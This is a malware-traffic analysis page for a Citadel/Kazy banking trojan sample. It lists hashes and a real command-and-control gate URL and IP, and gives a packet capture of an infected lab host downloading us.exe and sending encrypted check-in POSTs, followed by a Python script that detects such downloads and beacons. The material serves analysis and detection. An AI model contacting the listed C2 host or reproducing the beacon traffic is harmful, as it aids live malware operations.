Citadel/Kazy Malware Sample Loaded from us.exe qawsf1gy.bget.ru file.php PCAP file download

Download Attachments

  • pcap us (301 KB; added September 24, 2016 4:34 am by admin)

https://www.virustotal.com/cs/file/00f9c0fd7b6ab235bf07a4f1e235940e3e40938c5932a7283568f36d76df673b/analysis/

https://www.virustotal.com/cs/domain/qawsf1gy.bget.ru/information/

http://cybercrime-tracker.net/ccamdetail.php?hash=8a76acba63abcdb9cfc0a71e8c1358c74e8db83b


SPYWARE.CITADEL.ATMOS

Sample: 8a76acba63abcdb9cfc0a71e8c1358c74e8db83b
SHA256: 7331a96dbd2bec70027e259f1cbdaf5c7733b318da39812b22111f85ae730860
Request: Tayuya [2016/09/20 – 23:09:39]
Callback: qawsf1gy.bget.ru
Gate: http://qawsf1gy.bget.ru/file.php|file=us.xml

2016-09-20 10:29:07.228008 IP 192.168.1.102.59912 > 192.168.1.100.80: Flags [P.], seq 1:333, ack 1, win 256, length 332: HTTP: GET /captured/us.exe HTTP/1.1
E..t.d.........f...d...P..9..G..P...N<..GET /captured/us.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://192.168.1.100/captured/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100
Connection: Keep-Alive
2016-09-20 10:29:07.228032 IP 192.168.1.100.80 > 192.168.1.102.59912: Flags [.], ack 333, win 237, length 0
E..(f.@.@.P&...d...f.P...G....;.P....5..
2016-09-20 10:29:07.228202 IP 192.168.1.100.80 > 192.168.1.102.59912: Flags [.], seq 1:2921, ack 333, win 237, length 2920: HTTP: HTTP/1.1 200 OK
E...f.@.@.D....d...f.P...G....;.P.......HTTP/1.1 200 OK
Date: Tue, 20 Sep 2016 14:29:07 GMT
Server: Apache/2.4.18 (Debian)
Last-Modified: Tue, 20 Sep 2016 09:31:34 GMT
ETag: "42000-53ced182f7dde"
Accept-Ranges: bytes
Content-Length: 270336
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
2016-09-20 10:33:23.877361 IP 192.168.1.102.59918 > 87.236.19.58.80: Flags [P.], seq 353:706, ack 519, win 63722, length 353: HTTP: POST /file.php HTTP/1.1
E...lZ.........fW..:...Pfd......P...6
..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.^.W.v}.U.io(..>..~u..L.....].]eb<.........+.X..P{. ..j.q1.P....,I..0.
..6.j)...........E.D..os.".V..*w.2~9|O.....8..1...vm.d...V..?.....c1R'.
2016-09-20 10:33:24.018449 IP 192.168.1.102.59918 > 87.236.19.58.80: Flags [P.], seq 706:1059, ack 1037, win 63204, length 353: HTTP: POST /file.php HTTP/1.1
E...l[.........fW..:...Pfd. ....P....u..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.. #Yx.// .F.M..i..k;t.....H....).OiH....1K....-..;..:E...*Dg......qq.....&C.Ib.h.?.Uz..~.b.....i..c..(..Nu...7.)@-B...fj........k.K..;....{.4
2016-09-20 10:33:24.157065 IP 192.168.1.102.59918 > 87.236.19.58.80: Flags [P.], seq 1059:1412, ack 1555, win 64240, length 353: HTTP: POST /file.php HTTP/1.1
E...l\.........fW..:...Pfd.j....P.......POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.. #Yx.// .F.M..i..k;t.....H....).OiH....1K....-..;..:E...*Dg......qq.....&C.Ib.h.?.Uz..~.b.....i..c..(..Nu...7.)@-B...fj........k.K..;....{.4
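What the capture shows, and one way to triage it: the host 192.168.1.102 pulls us.exe from a directory listing on a lab web server (192.168.1.100; the response is Content-Type application/x-msdos-program, 270336 bytes), and about four minutes later starts POSTing 142-byte bodies to /file.php on qawsf1gy.bget.ru (87.236.19.58) with no Referer and Cache-Control: no-cache. The bodies are not plaintext, so detection has to rest on the request metadata. The script below is an added example, not code from this page: it parses tcpdump -A text as printed above into per-packet HTTP records, pairs the 200 OK with its request through the TCP 4-tuple, and flags the executable download and the repeated fixed-size POST group. The embedded SAMPLE is constructed from this capture with the noise lines shortened and the encrypted bodies replaced by a placeholder, and the beacon heuristic (two or more POSTs to one client/Host/path, identical Content-Length, no Referer) is an assumption, not a Citadel signature. The filename triage.py in the usage note is likewise assumed.

```python
"""Triage a tcpdump -A text dump for the pattern in the capture above: an EXE
fetched over HTTP, then fixed-size POST check-ins.  Added example, not page code;
SAMPLE is constructed from the capture and the heuristic is an assumption."""
import re
from collections import defaultdict

# tcpdump summary line "<ts> IP <src>.<sport> > <dst>.<dport>: ..." (numeric ports, -n)
PKT_RE = re.compile(r"^(?P<ts>\S+ \S+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
                    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): ")
REQ_RE = re.compile(r"\b(GET|POST|HEAD|PUT) (\S+) HTTP/1\.[01]")
STATUS_RE = re.compile(r"HTTP/1\.[01] (\d{3})\b")
HDR_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): (.*)$")
EXE_TYPES = {"application/x-msdos-program", "application/x-msdownload"}

def parse_tcpdump_ascii(text):
    """One record per packet carrying an HTTP request or status line.  -A prints
    non-printable bytes as '.', so the request line may follow a run of dots on
    the line below the summary; only headers are parsed, the body is opaque."""
    records, cur, in_body = [], None, False
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            cur = {"src": m["src"], "sport": int(m["sport"]), "dst": m["dst"],
                   "dport": int(m["dport"]), "method": None, "uri": None,
                   "status": None, "headers": {}}
            records.append(cur)
            in_body = False  # fall through: the summary itself may name the request
        if cur is None or in_body:
            continue
        if cur["method"] is None and cur["status"] is None:
            r, s = REQ_RE.search(line), STATUS_RE.search(line)
            if r:
                cur["method"], cur["uri"] = r.group(1), r.group(2)
            elif s:
                cur["status"] = int(s.group(1))
            continue
        h = HDR_RE.match(line)
        if line.strip() == "":
            in_body = True  # blank line ends the headers
        elif h:
            cur["headers"][h.group(1).lower()] = h.group(2).strip()
    return [r for r in records if r["method"] or r["status"]]

def find_executable_downloads(records):
    """(client, server, uri, bytes) per 200 OK serving a Windows executable, matched
    to its request through the reversed TCP 4-tuple."""
    last_req, hits = {}, []
    for r in records:
        if r["method"]:
            last_req[(r["src"], r["sport"], r["dst"], r["dport"])] = r
        elif r["status"] == 200 and r["headers"].get("content-type") in EXE_TYPES:
            req = last_req.get((r["dst"], r["dport"], r["src"], r["sport"]))
            hits.append((r["dst"], r["src"], req["uri"] if req else None,
                         int(r["headers"].get("content-length", 0))))
    return hits

def find_post_beacons(records, min_posts=2):
    """POST groups (client, Host, path) that look like bot check-ins rather than
    browsing: repeated, same Content-Length every time, no Referer (assumed thresholds)."""
    groups = defaultdict(list)
    for r in records:
        if r["method"] == "POST":
            groups[(r["src"], r["headers"].get("host", r["dst"]), r["uri"])].append(r)
    beacons = []
    for (client, host, uri), posts in groups.items():
        lengths = {p["headers"].get("content-length") for p in posts}
        if (len(posts) >= min_posts and len(lengths) == 1 and None not in lengths
                and not any("referer" in p["headers"] for p in posts)):
            beacons.append({"client": client, "host": host, "uri": uri,
                            "count": len(posts), "content_length": int(lengths.pop()),
                            "user_agent": posts[0]["headers"].get("user-agent")})
    return beacons

# Constructed sample: the capture above, noise shortened, encrypted bodies replaced.
_POST = """\
2016-09-20 10:33:{t} IP 192.168.1.102.59918 > 87.236.19.58.80: Flags [P.], seq {a}:{b}, ack 519, win 63722, length 353: HTTP: POST /file.php HTTP/1.1
..POST /file.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Cache-Control: no-cache

.^.W.v..U.io(..>..~u..L.....(encrypted body placeholder)
"""
SAMPLE = """\
2016-09-20 10:29:07.228008 IP 192.168.1.102.59912 > 192.168.1.100.80: Flags [P.], seq 1:333, ack 1, win 256, length 332: HTTP: GET /captured/us.exe HTTP/1.1
E..t.d.........f...d...P..9..G..P...N<..GET /captured/us.exe HTTP/1.1
Referer: http://192.168.1.100/captured/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
2016-09-20 10:29:07.228202 IP 192.168.1.100.80 > 192.168.1.102.59912: Flags [.], seq 1:2921, ack 333, win 237, length 2920: HTTP: HTTP/1.1 200 OK
E...f.@.@.D....d...f.P...G....;.P.......HTTP/1.1 200 OK
Content-Length: 270336
Content-Type: application/x-msdos-program
""" + "".join(_POST.format(t=t, a=a, b=a + 353)
              for t, a in (("23.877361", 353), ("24.018449", 706), ("24.157065", 1059)))

if __name__ == "__main__":
    import sys
    recs = parse_tcpdump_ascii(SAMPLE if sys.stdin.isatty() else sys.stdin.read())
    print("executable downloads:", find_executable_downloads(recs))
    print("post beacons:", find_post_beacons(recs))
```

Run it over the attached pcap with `tcpdump -n -A -r us.pcap 'tcp port 80' | python3 triage.py` (-n keeps ports numeric, which the summary-line regex expects); with nothing on stdin it runs over SAMPLE. Identical Content-Length across check-ins is what makes this traffic stand out in proxy logs as well: browser-driven POSTs vary in size and normally carry a Referer.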
